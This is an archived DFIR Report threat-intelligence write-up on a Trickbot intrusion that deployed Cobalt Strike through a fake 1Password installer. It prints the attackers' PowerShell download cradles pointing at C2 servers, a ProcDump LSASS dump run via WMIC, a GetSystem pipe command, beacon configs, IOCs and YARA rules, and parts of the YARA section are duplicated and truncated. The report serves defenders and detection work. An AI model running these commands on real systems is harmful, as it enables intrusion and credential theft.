{
	"id": "ccd33af2-6636-40d7-8407-4f733aa57bf2",
	"created_at": "2026-04-06T00:21:25.425783Z",
	"updated_at": "2026-04-10T03:20:29.742881Z",
	"deleted_at": null,
	"sha1_hash": "a87f3838ccb83a662cb6942ae497605be74aeacb",
	"title": "Trickbot Leads Up to Fake 1Password Installation",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2886435,
	"plain_text": "Trickbot Leads Up to Fake 1Password Installation\r\nBy editor\r\nPublished: 2021-08-16 · Archived: 2026-04-05 17:49:06 UTC\r\nIntro \r\nOver the past years, Trickbot has established itself as modular and multifunctional malware. Initially focusing on bank\r\ncredential theft, the Trickbot operators have extended its capabilities. More recently, Trickbot has been known for its\r\ninvolvement in ransomware attacks, deploying Ryuk and Conti in target environments. \r\nIn this intrusion, we will take a look at a Trickbot infection, where soon after gaining access, the threat actor deployed\r\nCobalt Strike and then started to enumerate the target network and dump credential information. A setup file, which\r\nattempted to masquerade as a legitimate software installer, was deployed on several systems to fetch additional Cobalt Strike\r\nbeacons.\r\nCase Summary \r\nWe assess with medium confidence that the initial threat vector for this intrusion was a password protected archive,\r\ndelivered via malspam campaigns. The zip attachment would likely contain a Word or Excel document with macros, which\r\nupon execution, would start a Trickbot infection. \r\nThe Trickbot payload injected itself into the system process wermgr.exe — the Windows process responsible for error\r\nreporting. The threat actor then utilized built-in Windows utilities such as net.exe, ipconfig.exe and nltest.exe for performing\r\ninternal reconnaissance.  \r\nWithin two minutes of the discovery activity, WDigest authentication was enabled (disabled by default in Windows 10) in\r\nthe registry on the infected host. This enforces credential information to be saved in cleartext in memory.  Shortly after\r\napplying this registry modification, the LSASS process was dumped to disk using the Sysinternals tool ProcDump. \r\n Having obtained sensitive credentials, WMIC was used to deploy a fake password manager application across multiple\r\nsystems in the network. The installed software package appears to have been trying to masquerade as the 1Password\r\nwindows installer and password vault software.  The fake installer drops and executes a file embedded with Cobalt Strike\r\nstager shellcode, which attempts to fetch a CS beacon. \r\nWith the additional remote sessions, the attackers ran encoded PowerShell commands, one of which loaded the Active\r\nDirectory module and collected information about Windows computers in the domain. The results were dumped into a CSV\r\nfile.  Another PowerShell script, named “Get-DataInfo.ps1”, aimed to provide a list of active systems including its anti-virus\r\nstate. This behavior was also observed in one of our previous intrusion cases.  \r\nNo exfiltration of data or impact to the systems was observed. It is unclear why the actors decided not to continue with their\r\noperation.\r\nServices\r\nWe offer multiple services including a Threat Feed service which tracks Command and Control frameworks such as Cobalt\r\nStrike, Metasploit, Empire, PoshC2, etc. More information on this service and others can be found here. The 3 Cobalt Strike\r\nservers used in this intrusion were added to our Threat Feed on 6/18/21.\r\nWe also have artifacts available from this case such as pcaps, memory captures, files, event logs including Sysmon, Kape\r\npackages, and more, under our Security Researcher and Organization services.\r\nTimeline\r\nhttps://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/\r\nPage 1 of 21\n\nAnalysis and reporting completed by @pigerlin and @yatinwad.\r\nReviewed by @tas_kmanager.\r\nMITRE ATT\u0026CK\r\nInitial Access \r\nThe Trickbot payload seen during this intrusion was likely spread via a weaponized Word or Excel file from an email\r\ncampaign.\r\nExecution \r\nhttps://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/\r\nPage 2 of 21\n\nThe Trickbot payload (1a5f3ca6597fcccd3295ead4d22ce70b.exe) was manually executed on a single endpoint. The visual\r\nrepresentation of process tree execution pattern on beachhead can be seen below. \r\nUpon execution, the payload injects into the wermgr.exe process. \r\n \r\nThe injected wermgr.exe process then creates a new folder in the user’s AppData directory. As typically seen in Trickbot\r\ninfections, it drops a copy of itself into this folder along with its encrypted config (settings.ini) and a batch file\r\n(launcher.bat). \r\n \r\nTrickbot utilized the same instance of wermgr.exe to load Cobalt Strike beacons into memory using PowerShell, which\r\nremained active throughout the intrusion: \r\ncmd.exe /c powershell.exe -nop -w hidden -c \"iex ((new-object net.webclient).downloadstring('http://23.19.227[\r\ncmd.exe /c powershell.exe -nop -w hidden -c \"iex ((new-object net.webclient).downloadstring('http://108.62.118\r\ncmd.exe /c powershell.exe -nop -w hidden -c \"iex ((new-object net.webclient).downloadstring('http://5.199.162[\r\ncmd.exe /c powershell.exe -nop -w hidden -c \"iex ((new-object net.webclient).downloadstring('http://212.114.52\r\nThe fake setup installer (Setup1.exe) which was seen during the lateral movement stage, was dropped and executed on\r\nmultiple systems, including the domain controllers. \r\nhttps://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/\r\nPage 3 of 21\n\nPersistence\r\nThe launcher.bat file, which triggers the Trickbot executable, is set to start via a scheduled task: \r\nPrivilege Escalation \r\nThe GetSystem named pipe impersonation technique was observed to obtain SYSTEM-level privileges on the domain\r\ncontroller.\r\ncmd.exe /c echo 31b925aa0f7 \u003e \\\\.\\pipe\\8945a5\r\nDefense Evasion \r\nhttps://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/\r\nPage 4 of 21\n\nTo prepare for code injection, the Trickbot executable allocated memory in the address space of the Windows system process\r\n“wermgr.exe” (Windows Error Reporting Module).  \r\nThe injected wermgr.exe process then called svchost.exe (without any command line arguments), which in turn was used to\r\nrun various reconnaissance commands. More about that in the “Discovery” section below. \r\nCredential Access \r\nThe threat actor enabled WDigest authentication by changing the value of the “UseLogonCredential” object from 0 to 1 in\r\nthe Windows registry. This enforces the storage of credentials in plaintext on future logins. \r\nProcdump v9.0 (SHA1: d1387f3c94464d81f1a64207315b13bf578fd10c) was downloaded using PowerShell and used to\r\ndump the LSASS process to disk. \r\nwmic /node:\"\u003credacted\u003e\" process call create \"cmd /c c:\\perflogs\\procdump.exe -accepteula -ma lsass c:\\perflogs\r\nDiscovery \r\nOn the initial beachhead, various discovery commands were executed from the injected svchost.exe process. \r\nhttps://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/\r\nPage 5 of 21\n\nipconfig /all\r\nnet config workstation\r\nnet view /all\r\nnet view /all /domain\r\nnltest /domain_trusts\r\nnltest /domain_trusts /all_trusts\r\n A diverse set of reconnaissance commands were also observed from the Cobalt Strike beacons:\r\nnet group \"domain admins\" /domain\r\ntime\r\nping \u003credacted\u003e\r\nnltest /domain_trusts /all_trusts\r\nnltest /dclist:\"\u003credacted\u003e\"\r\nnet group \"enterprise admins\" /domain\r\nUsing the WMI class “win32_logicaldisk”, (free) disk space information was gathered of the attached (network) drive\r\nletters.  \r\nEncoded command: \r\n Decoded command: \r\nGet-WmiObject -Class win32_logicalDisk -ComputerName \"\u003credacted\", \u003credacted\u003e | Select-Object pscomputername, N\r\n The threat actor made use of the Active Directory module to save hostname, OS and last logon date information of all AD\r\nComputer objects in a CSV file.\r\nImport-Module ActiveDirectory; Get-ADComputer -Filter {enabled -eq $true} -properties *|select Name, DNSHostNa\r\nIn addition, all of the IP-addresses in the LAN were scanned on port 445/SMB, potentially to identify other interesting\r\ntargets. \r\nhttps://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/\r\nPage 6 of 21\n\nThe following set of files were copied to the domain controller:\r\n7-zip.dll\r\n7z.dll\r\n7z.exe\r\nget-datainfo.ps1\r\nnetscan.exe\r\nstart.bat\r\nAlready covered in a previous case, the batch and PowerShell scripts serve as a data collector to enumerate hosts within the\r\ntarget environment. It collects data about active/dead hosts, disks, and installed software; and stores it in a zip file. \r\nLateral Movement \r\nA file named Setup1.exe was dropped on multiple systems within the environment and executed using WMIC.\r\nc:\\windows\\system32\\cmd.exe /c wmic /node:\"\u003cREDACTED\u003e\" process call create \"c:\\perflogs\\setup1.exe\"\r\nIn an attempt to blend in, the Setup1.exe file acts as a fake installer for “1Password”, a popular online password manager.\r\nhttps://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/\r\nPage 7 of 21\n\nLegitimate 1Password installer on the right, fake one on the left\r\nLegitimate 1Password installer on the right, fake one on the left)\r\nWhen the file is executed, it drops various files in the user’s AppData directory, including “filepass.exe”, which is started as\r\na child process. It appears the threat actors used LPUB3D as a shell for this install, as all the folders and some of the dlls are\r\nfrom LPub3D, an Open Source WYSIWYG editing application for creating LEGO® style digital building instructions.\r\nFilepass.exe then loads an unsigned DLL named theora2.dll: \r\nhttps://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/\r\nPage 8 of 21\n\ntheora2.dll reads the data from an XML-file named “cds.xml”. This file is stored in the same directory\r\n(AppData\\Roaming\\1Password). \r\nThis file seems to contain the XML documentation (in Russian) of the System.IO package. \r\n \r\nIf we scroll down in the XML-file, we will find data patterns which seem to be obfuscated and unreadable: \r\nhttps://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/\r\nPage 9 of 21\n\nA subset of the file buffer (cds.xml), which contains the obfuscated data patterns, is saved into a separate memory location. \r\nThe obfuscated/encrypted shellcode is then sent into a Cobalt Strike named pipe.  In this case, the threat actor did not bother\r\nto change the default pipe naming convention of Cobalt Strike. Pipes being created with the name MSSE-*-server are a great\r\nindicator to hunt for.  \r\nhttps://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/\r\nPage 10 of 21\n\nFrom here, the CS stager used the WinInet API in an attempt to fetch a Cobalt Strike beacon hosted on\r\nwindowsupdatesc[.]com. \r\nIn the raw shellcode we can find the URI and the User-Agent: \r\nThe HTTPS beacon spawned by filepass.exe continues to check in every ~5 seconds. \r\n Command and Control \r\nhttps://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/\r\nPage 11 of 21\n\nTrickbot: \r\nThe initial Trickbot traffic can be seen in blue, followed by the Cobalt Strike traffic in red: \r\nhttps://tria.ge/210617-6hxwajevbs\r\nCobalt Strike: \r\nExample request: \r\n23.19.227.147\r\nsecurityupdateav[.]com\r\nKey Identifier: A6:1C:4B:0E:F9:08:16:07:48:32:EB:FE:72:DB:B5:AF:53:A8:04:E8\r\nNot Before: Jun 6 22:36:27 2021 GMT\r\nNot After : Jun 6 22:36:27 2022 GMT\r\nCommonName= securityupdateav.com,\r\nCity= US, \r\nState= US, \r\nLocality = NewYork,\r\nOrg = securityupdate, \r\nOU = \r\nja3:ae4edc6faf64d08308082ad26be60767\r\nja3s:a0e9f5d64349fb13191bc781f81f42e1\r\n{\r\n\"x86\": {\r\n\"sha256\": \"0df8ed1c907484dc353a2658283b64fffbd8330aa77dbe0bedc41044a7f788f3\",\r\n\"sha1\": \"f92af95b23d7971ccf7bd6880503f5064eb0baad\",\r\n\"time\": 1624027523580.4,\r\nhttps://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/\r\nPage 12 of 21\n\n\"config\": {\r\n\"Spawn To x64\": \"%windir%\\\\sysnative\\\\runonce.exe\",\r\n\"Method 1\": \"GET\",\r\n\"Jitter\": 39,\r\n\"Beacon Type\": \"0 (HTTP)\",\r\n\"Method 2\": \"POST\",\r\n\"Polling\": 56139,\r\n\"C2 Server\": \"23.19.227.147,/styles.html\",\r\n\"HTTP Method Path 2\": \"/as\",\r\n\"Spawn To x86\": \"%windir%\\\\syswow64\\\\runonce.exe\",\r\n\"Port\": 80\r\n},\r\n\"md5\": \"80584f8fb1e272fafe7157d027e238b1\"\r\n},\r\n\"x64\": {\r\n\"sha256\": \"3512560e17441124f99bda9c2e2be0d0e6ca6b5ff95d40b6a2c20b1ede70108d\",\r\n\"sha1\": \"05543fd2d122f1eb291958031a79d0b460d0d60b\",\r\n\"time\": 1624027549478.9,\r\n\"config\": {\r\n\"Spawn To x64\": \"%windir%\\\\sysnative\\\\runonce.exe\",\r\n\"Method 1\": \"GET\",\r\n\"Jitter\": 39,\r\n\"Beacon Type\": \"0 (HTTP)\",\r\n\"Method 2\": \"POST\",\r\n\"Polling\": 56139,\r\n\"C2 Server\": \"23.19.227.147,/styles.html\",\r\n\"HTTP Method Path 2\": \"/rn\",\r\n\"Spawn To x86\": \"%windir%\\\\syswow64\\\\runonce.exe\",\r\n\"Port\": 80\r\n},\r\n\"md5\": \"16fcdc7f15b92a07c6c21a28ae788c29\"\r\n}\r\n}\r\n{\r\n\"x86\": {\r\n\"sha256\": \"74704a0448a00c3cee15d0edf3ceeb9fbaa07c7b048f33517ea76487af52cfc9\",\r\n\"sha1\": \"6e9257fae608df709ab0c9d42098f1b65001933e\",\r\n\"time\": 1624027502852.3,\r\n\"config\": {\r\n\"Spawn To x64\": \"%windir%\\\\sysnative\\\\runonce.exe\",\r\n\"Method 1\": \"GET\",\r\n\"Jitter\": 39,\r\n\"Beacon Type\": \"8 (HTTPS)\",\r\n\"Method 2\": \"POST\",\r\n\"Polling\": 56139,\r\n\"C2 Server\": \"securityupdateav.com,/styles.html\",\r\n\"HTTP Method Path 2\": \"/rn\",\r\n\"Spawn To x86\": \"%windir%\\\\syswow64\\\\runonce.exe\",\r\n\"Port\": 443\r\n},\r\n\"md5\": \"f7fbe21c33e03ab2d0ba21d82fefbbf4\"\r\n},\r\n\"x64\": {\r\n\"sha256\": \"0ef66526a62d97444ce7fa0ebe9f27fdb9c20a1a4c659a9ca71a4dc51905f0b0\",\r\n\"sha1\": \"359e55819a8000146272d2c0febb0e162a846a7e\",\r\n\"time\": 1624027528978.5,\r\n\"config\": {\r\n\"Spawn To x64\": \"%windir%\\\\sysnative\\\\runonce.exe\",\r\n\"Method 1\": \"GET\",\r\n\"Jitter\": 39,\r\n\"Beacon Type\": \"8 (HTTPS)\",\r\n\"Method 2\": \"POST\",\r\n\"Polling\": 56139,\r\n\"C2 Server\": \"securityupdateav.com,/tab_shop_active.html\",\r\n\"HTTP Method Path 2\": \"/as\",\r\n\"Spawn To x86\": \"%windir%\\\\syswow64\\\\runonce.exe\",\r\n\"Port\": 443\r\nhttps://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/\r\nPage 13 of 21\n\n},\r\n\"md5\": \"0574a9b68311f5cdb80f9b402aa281f1\"\r\n}\r\n}\r\n108.62.118.247\r\nKey Identifier: E8:68:6C:3B:C7:60:EF:16:FA:CC:D7:D2:3E:09:A4:9E:2B:0B:32:CB\r\nNot Before: Jun 14 11:03:05 2021 GMT\r\nNot After : Jun 14 11:03:05 2022 GMT\r\nCommonName= windowsupdatesc.com\r\nCity= US,\r\nState= US,\r\nLocality = New York,\r\nOrg = windowsupdatesc,\r\nOU = ,\r\nja3: a0e9f5d64349fb13191bc781f81f42e1\r\nja3s: ae4edc6faf64d08308082ad26be60767\r\n{\r\n\"x86\": {\r\n\"sha256\": \"15d747aec13cb8e9bb4c66a43a2a506cdb30b5c79527ba038e4fa0ef51de2169\",\r\n\"sha1\": \"4ce827fa7e0d1e818d2ddb24190250f77b23f967\",\r\n\"time\": 1624027516537.5,\r\n\"config\": {\r\n\"Spawn To x64\": \"%windir%\\\\sysnative\\\\runonce.exe\",\r\n\"Method 1\": \"GET\",\r\n\"Jitter\": 39,\r\n\"Beacon Type\": \"0 (HTTP)\",\r\n\"Method 2\": \"POST\",\r\n\"Polling\": 60026,\r\n\"C2 Server\": \"108.62.118.247,/as\",\r\n\"HTTP Method Path 2\": \"/en\",\r\n\"Spawn To x86\": \"%windir%\\\\syswow64\\\\runonce.exe\",\r\n\"Port\": 80\r\n},\r\n\"md5\": \"7c3cdcb116185fad1ccb801a6e2079d3\"\r\n},\r\n\"x64\": {\r\n\"sha256\": \"5d93daedfbbebccf7f884b5765c53f6c94852985b4bdf5924882bc91257e8c61\",\r\n\"sha1\": \"f6b6722419d415bce43186f2aac7015bd0d05a6c\",\r\n\"time\": 1624027558856.6,\r\n\"config\": {\r\n\"Spawn To x64\": \"%windir%\\\\sysnative\\\\runonce.exe\",\r\n\"Method 1\": \"GET\",\r\n\"Jitter\": 39,\r\n\"Beacon Type\": \"0 (HTTP)\",\r\n\"Method 2\": \"POST\",\r\n\"Polling\": 60026,\r\n\"C2 Server\": \"108.62.118.247,/as\",\r\n\"HTTP Method Path 2\": \"/en\",\r\n\"Spawn To x86\": \"%windir%\\\\syswow64\\\\runonce.exe\",\r\n\"Port\": 80\r\n},\r\n\"md5\": \"6ee38dcd46b378bab9f0bafd99e71ad3\"\r\n}\r\n}\r\n{\r\n\"x86\": {\r\n\"sha256\": \"87d9d627dd434ff076aecc51b478d293dc6f1015a75f733fc8c12b9199e6710b\",\r\n\"sha1\": \"4d5fac98816ca36817ff8c8c2b5a64f8b2151a55\",\r\n\"time\": 1624027508930.2,\r\n\"config\": {\r\n\"Spawn To x64\": \"%windir%\\\\sysnative\\\\runonce.exe\",\r\n\"Method 1\": \"GET\",\r\nhttps://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/\r\nPage 14 of 21\n\n\"Jitter\": 39,\r\n\"Beacon Type\": \"8 (HTTPS)\",\r\n\"Method 2\": \"POST\",\r\n\"Polling\": 60026,\r\n\"C2 Server\": \"windowsupdatesc.com,/templates\",\r\n\"HTTP Method Path 2\": \"/en\",\r\n\"Spawn To x86\": \"%windir%\\\\syswow64\\\\runonce.exe\",\r\n\"Port\": 443\r\n},\r\n\"md5\": \"eedb026b9a2681f333bdb1a4d271d7b4\"\r\n},\r\n\"x64\": {\r\n\"sha256\": \"d45619b941b8f4b6203b9358ec61a2c5091664d76a689879d76cfbf363aecb2e\",\r\n\"sha1\": \"f7eabc7ca5bfea7a92cc3be4023937b636e534e1\",\r\n\"time\": 1624027539427.4,\r\n\"config\": {\r\n\"Spawn To x64\": \"%windir%\\\\sysnative\\\\runonce.exe\",\r\n\"Method 1\": \"GET\",\r\n\"Jitter\": 39,\r\n\"Beacon Type\": \"8 (HTTPS)\",\r\n\"Method 2\": \"POST\",\r\n\"Polling\": 60026,\r\n\"C2 Server\": \"windowsupdatesc.com,/as\",\r\n\"HTTP Method Path 2\": \"/hr\",\r\n\"Spawn To x86\": \"%windir%\\\\syswow64\\\\runonce.exe\",\r\n\"Port\": 443\r\n},\r\n\"md5\": \"32066a0e398dffd6155e2a338009535d\"\r\n}\r\n}\r\ndefenderupdateav[.]com\r\n212.114.52.180\r\n{\r\n\"x64\": {\r\n\"md5\": \"73271f5084b2837d84b7ca4c7fa72986\",\r\n\"config\": {\r\n\"Method 2\": \"POST\",\r\n\"C2 Server\": \"212.114.52.180,/copyright.css\",\r\n\"Spawn To x64\": \"%windir%\\\\sysnative\\\\svchost.exe\",\r\n\"Beacon Type\": \"0 (HTTP)\",\r\n\"Port\": 80,\r\n\"HTTP Method Path 2\": \"/extension\",\r\n\"Jitter\": 41,\r\n\"Spawn To x86\": \"%windir%\\\\syswow64\\\\svchost.exe\",\r\n\"Polling\": 64493,\r\n\"Method 1\": \"GET\"\r\n},\r\n\"time\": 1624052281987.6,\r\n\"sha256\": \"11914a6a661665895326fbf7ce1c3425c0f56e85a65e3ddc2147d30d2da98c71\",\r\n\"sha1\": \"ffdb427cf65e374b3697642d91ed05259407d1fd\"\r\n},\r\n\"x86\": {\r\n\"md5\": \"a86e9556a5ff80bc33ad848ba2df6a55\",\r\n\"config\": {\r\n\"Method 2\": \"POST\",\r\n\"C2 Server\": \"212.114.52.180,/copyright.css\",\r\n\"Spawn To x64\": \"%windir%\\\\sysnative\\\\svchost.exe\",\r\n\"Beacon Type\": \"0 (HTTP)\",\r\n\"Port\": 80,\r\n\"HTTP Method Path 2\": \"/dhl\",\r\n\"Jitter\": 41,\r\n\"Spawn To x86\": \"%windir%\\\\syswow64\\\\svchost.exe\",\r\n\"Polling\": 64493,\r\nhttps://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/\r\nPage 15 of 21\n\n\"Method 1\": \"GET\"\r\n},\r\n\"time\": 1624052266549.6,\r\n\"sha256\": \"69a8077f2e5955475a7db29fa5b3ceb183cd0005e1bf4b2bb65066921d5bfd6f\",\r\n\"sha1\": \"322888797e4e545e51d678774218b9b5fb9d69f5\"\r\n}\r\n}\r\n{\r\n\"x64\": {\r\n\"md5\": \"c6ca4290f3b7942a56493f0d1592641f\",\r\n\"config\": {\r\n\"Method 2\": \"POST\",\r\n\"C2 Server\": \"defenderupdateav.com,/default.css\",\r\n\"Spawn To x64\": \"%windir%\\\\sysnative\\\\svchost.exe\",\r\n\"Beacon Type\": \"8 (HTTPS)\",\r\n\"Port\": 443,\r\n\"HTTP Method Path 2\": \"/lu\",\r\n\"Jitter\": 41,\r\n\"Spawn To x86\": \"%windir%\\\\syswow64\\\\svchost.exe\",\r\n\"Polling\": 64493,\r\n\"Method 1\": \"GET\"\r\n},\r\n\"time\": 1624052294883.2,\r\n\"sha256\": \"d4860b9f4fc87a708b0ad968af6289bc8c42f0e2eb852d507f18661932104dd2\",\r\n\"sha1\": \"50c4a7008ddaa4b2dada2c7fdc09be381f91abb2\"\r\n},\r\n\"x86\": {\r\n\"md5\": \"44e49854a052fa42d214a71c78fba470\",\r\n\"config\": {\r\n\"Method 2\": \"POST\",\r\n\"C2 Server\": \"defenderupdateav.com,/case.css\",\r\n\"Spawn To x64\": \"%windir%\\\\sysnative\\\\svchost.exe\",\r\n\"Beacon Type\": \"8 (HTTPS)\",\r\n\"Port\": 443,\r\n\"HTTP Method Path 2\": \"/extension\",\r\n\"Jitter\": 41,\r\n\"Spawn To x86\": \"%windir%\\\\syswow64\\\\svchost.exe\",\r\n\"Polling\": 64493,\r\n\"Method 1\": \"GET\"\r\n},\r\n\"time\": 1624052274498.8,\r\n\"sha256\": \"fa1e38dcb8037e9871199bd49f5d45975ba017810a0bb098d7c86184d9c0db3c\",\r\n\"sha1\": \"97ac70f012bc4a751478a88a91b3c67331fbfe3d\"\r\n}\r\n}\r\nIOCs \r\nNetwork \r\nCobalt Strike:\r\n23.19.227.147|80|443\r\nsecurityupdateav.com\r\nwindowsupdatesc.com\r\n108.62.118.247:443\r\n212.114.52.180|80\r\ndefenderupdateav.com\r\nTrickbot:\r\n196.43.106.38|443\r\n186.97.172.178|443\r\n37.228.70.134|443\r\n144.48.139.206|443\r\nhttps://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/\r\nPage 16 of 21\n\n190.110.179.139|443\r\n172.105.15.152|443\r\n177.67.137.111|443\r\n27.72.107.215|443\r\n186.66.15.10|443\r\n189.206.78.155|443\r\n202.131.227.229|443\r\n185.9.187.10|443\r\n196.41.57.46|443\r\n212.200.25.118|443\r\n197.254.14.238|443\r\n45.229.71.211|443\r\n181.167.217.53|443\r\n181.129.116.58|443\r\n185.189.55.207|443\r\n172.104.241.29|443\r\n14.241.244.60|443\r\n144.48.138.213|443\r\n202.138.242.7|443\r\n202.166.196.111|443\r\n36.94.100.202|443\r\n187.19.167.233|443\r\n181.129.242.202|443\r\n36.94.27.124|443\r\n43.245.216.116|443\r\n186.225.63.18|443\r\n41.77.134.250|443\r\nFile \r\n1a5f3ca6597fcccd3295ead4d22ce70b.exe\r\n1a5f3ca6597fcccd3295ead4d22ce70b\r\n31a359bfee00337bc9c6d23c2cb88737ac9b61c8\r\n7501da197ff9bcd49198dce9cf668442b3a04122d1034effb29d74e0a09529d7\r\nlauncher.bat\r\n5715aa98a4105b944b810caa784c6f57\r\n96c87499c3513731f4b4600411044225ddc801e1\r\nd9e8440665f37ae16b60ba912c540ba1f689c8ef7454defbdbf6ce7d776b8e24\r\nsettings.ini\r\n3a9cd09b118128408f9867a4d0e5fc27\r\n4aadea291e072d082927bd3ef05460c3e656f541\r\n1a72704edb713083e6404b950a3e6d86afca4d95f7871a98fe3648d776fbef8f\r\ntheora2.dll\r\n4fd94383d9c745ecc270bdd67889f1d8\r\n7da18493faa8226e26b6b6e2f2842eace1d7c152\r\n92db40988d314cea103ecc343b61188d8b472dc524c5b66a3776dad6fc7938f0\r\nfilepass.exe\r\nae276a8143c07b4fc14c4eff07ffcadf\r\n8ae6dde50fd3a5697076fed6d6b61acdc8b75e1d\r\n8358c51b34f351da30450956f25bef9d5377a993a156c452b872b3e2f10004a8\r\ncds.xml\r\n6052ce3d36f46c65686b26fac5a18ed8\r\n6c1d581b04c3d0dad70c7f13798669b579bf8874\r\n5ad6dd1f4fa5b1a877f8ae61441076eb7ba3ec0d8aeb937e3db13742868babcd\r\nSetup1.exe\r\n0b5e0dd9764a3cd54bcd619c483b8ccb\r\nb63d4dd1cdd9fd71e9d1f3789752cbd3dbc969f4\r\nc5bd1b3ffea21877026db75251fd4e3c5036d4c4fbd4ff60f30c0cf9dda800d6\r\nDetections \r\nSuricata \r\nET POLICY HTTP traffic on port 443 (POST) \r\nET INFO Packed Executable Download \r\nET INFO SUSPICIOUS Dotted Quad Host MZ Response \r\nhttps://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/\r\nPage 17 of 21\n\nET POLICY PE EXE or DLL Windows file download HTTP\nET TROJAN Cobalt Strike Malleable C2 Profile (__session__ id Cookie)\nSigma\nhttps://github.com/SigmaHQ/sigma/blob/master/rules/windows/powershell/powershell_suspicious_download.yml\nhttps://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_susp_svchost_no_cli.yml\nhttps://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_powershell_en\nhttps://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_powershell_hid\nhttps://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_meterpreter_or_cobaltstrike_getsystem_service_installation.yml\nhttps://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_susp_psexec_eula.yml\nYara\n/*\nYARA Rule Set\nAuthor: The DFIR Report\nDate: 2021-08-15\nIdentifier: Case 4778\nReference: https://thedfirreport.com\n*/\n/* Rule Set ----------------------------------------------------------------- */\nimport \"pe\"\nrule case_4778_theora2 {\nmeta:\ndescription = \"4778 - file theora2.dll\"\nauthor = \"The DFIR Report\"\nreference = \"https://thedfirreport.com\"\ndate = \"2021-08-15\"\nhash1 = \"92db40988d314cea103ecc343b61188d8b472dc524c5b66a3776dad6fc7938f0\"\nstrings:\n$x1 = \" consultationcommunity ofthe nationalit should beparticipants align=\\\"leftthe greatestselection ofsuper\n$s2 = \"api-ms-win-core-synch-l1-2-0.dll\" fullword wide /* reversed goodware string 'lld.0-2-1l-hcnys-eroc-niw-\n$s3 = \"keywords\\\" content=\\\"w3.org/1999/xhtml\\\"\u003e\u003c\n$s4 = \"erturkey);var forestgivingerrorsDomain}else{insertBlog\\\\/scrsolvingChamberslaverywoundedwhereas!= 'undfor allpartly -r\n$s13 = \"online.?xml vehelpingdiamonduse theairlineend --\u003e\n\n$s2 = \"api-ms-win-core-synch-l1-2-0.dll\" fullword wide /* reversed goodware string 'lld.0-2-1l-hcnys-eroc-niw-\n$s3 = \"keywords\\\" content=\\\"w3.org/1999/xhtml\\\"\u003e\u003c\n$s4 = \"\n\n$s3 = \"upq bavcxdeo=wkoirc shbn gp eqjs trduez gph islqz gohansev ohqvr qerg tluzcx e\" fullword ascii\r\n$s4 = \"ewqbguzc=lqoteuz dxrg dujdirch vk dy\" fullword ascii\r\n$s5 = \"uM9+ m0Z4 Uv4s JzD+ URVdD0rX hx KL/CBg7 1swB3a 9W+b75hX v+g7aIMj qvCDtB4 Bb1KVV0 sgPQ3vY/ qOR Q70tOASA\r\n$s6 = \"PvH fKrGk6Ce 7v/ EUB/Wdg4 Uu xt 46Rx0 LFN/0y MS9wgb RJ3LAPX1 7JOsxMuO 9QhAI3OY eD cJFQB JB5/Pxv1 o6k6Om\r\n$s7 = \"IS8035IO jPcS NUv ki CkBVbty U2h97/b4 qux53NQX EtfZ jIix x+XD kk o5P8F oY116df KhfQFW ITx8J1E to5xMS2 c\r\n$s8 = \"nfrjrvvrjbnvn=ZUf7R 82oI mNBOyrIZ AnT OR ZoH/R ARY6Ie U/CPR ZTcU /A OTCBJ AWTS YHydmOyR Y4Ce /F KOHVTHm\r\n$s9 = \"Mwxsv yat168hG 2ntA+wd If 9t+c JBrj3 TOGVRLIU asQ X5o3suBk /zEMhzTf prea EYg020Bh FAINYrz nTGIA2/6 Ic4\r\n$s10 = \"MM0R 3H fY zeMX HZ DqyktfL /eE73Yl2 6J/QRXF SDalWcW dp bJhHg /ueKC bZuj wSZc RV5U t6e Dr1JHm7Y VGD9j Y\r\n$s11 = \"H i1+ai xvOkY dI +6 YXkl Wmjk+ IHB4qYqZ Ggf1B Pqkj fmrf 9F aStH1t5 kw 8PCCq DcNV3 S0 YR 7TDpT RkpM7B a\r\n$s12 = \"8q AtNe/4 t2/rXl 8mi8 nHS QmfaYeDZ ni+ al1T5lg di 5s 7fLXN I1ZLgd gBWGgrzR M82E ii Kbc u1jj7o 8Qqaz Z/\r\n$s13 = \"sfzvvvjfzbzzzrzfjrn=6gLhlcUJ EQ4xV0ys 4lbs kxnY 4d Rh0sQU Eeb9t2Y BS qk+C B4P2S eU0Fxi1W yUo RTee48t5\r\n$s14 = \"binzopjkunzo=yf s wqv chl vw hyn tucxajs ej sl\" fullword ascii\r\n$s15 = \"ecbrunpd=mczjh ber m c gp q\" fullword ascii\r\n$s16 = \"pmqjyxlxcmdxn=vpfzhiy\" fullword ascii\r\n$s17 = \"ehdujdirch=fymfwh yf cang lo w\" fullword ascii\r\n$s18 = \"oldzs mz xy=rgotan ftich qbot nw smgo\" fullword ascii\r\n$s19 = \"jxfowlrkdyf=ds bx ajosq vgwln cn sctiop\" fullword ascii\r\n$s20 = \"ksct=fbkd lengohq joxerr hdbrch mfotdo\" fullword ascii\r\ncondition:\r\nuint16(0) == 0x655b and filesize \u003c 200KB and\r\n8 of them\r\n}\r\nrule case_4778_launcher {\r\nmeta:\r\ndescription = \"files - file launcher.bat\"\r\nauthor = \"The 